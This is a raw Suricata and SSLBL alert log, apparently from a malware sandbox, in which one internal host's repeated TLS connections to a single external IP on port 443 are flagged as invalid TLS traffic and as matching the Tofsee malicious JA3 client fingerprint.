TCP 34.192.83.212:443 -> 192.168.56.101:49321 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49288 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49288 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49288 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49435 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49368 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49318 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49368 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49318 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49323 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49288 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49323 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49288 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49323 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49372 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49323 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49372 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49323 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49336 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49372 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49293 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49336 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49293 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49336 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49336 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49336 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49293 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49332 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49332 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49373 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49332 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49373 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49373 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49337 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49337 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49337 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49340 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49373 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49293 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49337 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49340 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49337 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49340 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49373 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49340 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49340 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49350 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49350 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49374 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49342 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49374 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49342 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49374 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49342 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49350 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49293 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49435 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49435 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49374 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49374 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49297 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49297 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49297 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49350 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49297 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49350 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49297 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49380 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49342 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49360 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49312 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49360 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49312 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49360 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49342 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49360 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49440 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49360 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49440 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49348 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49440 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49348 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49348 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49380 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49312 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49380 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49440 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49440 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49348 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49348 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49385 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49385 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49385 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49443 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49443 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49443 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49380 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49380 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49353 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49353 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49317 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49353 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49317 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49317 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49385 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49385 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49353 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49353 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49455 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49455 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49390 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49455 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49390 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49357 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49383 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49357 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49383 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49357 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49325 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49390 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49325 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49383 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49455 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49325 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49455 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49357 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49390 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49357 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49390 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49459 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49459 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49329 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49459 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49362 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49329 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49391 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49329 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49362 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49391 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49362 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49391 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49329 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49362 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49329 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49362 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49391 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49343 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49391 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49459 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49459 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49343 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49343 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49364 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49364 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49364 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49343 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49393 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49464 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49343 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49393 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49393 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49364 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49364 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49344 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49411 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49344 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49464 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49344 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49464 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49411 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49369 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49383 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49369 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49383 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49369 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49344 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49344 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49411 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49466 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49466 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49355 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49466 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49355 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49355 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49466 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49355 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49466 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49386 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49386 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49386 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49467 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49467 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49355 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49467 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49386 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49420 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49420 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49420 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49467 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49467 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49358 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49358 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49358 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49369 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49386 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49369 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49388 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49388 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49371 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49388 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49371 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49371 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49420 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49358 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49420 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49371 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49358 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49371 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49381 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49381 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49381 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49361 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49361 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49361 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49381 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49381 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49424 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49424 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49424 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49361 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49361 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49389 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49389 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49389 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49424 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49424 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49366 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49366 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49366 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49366 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
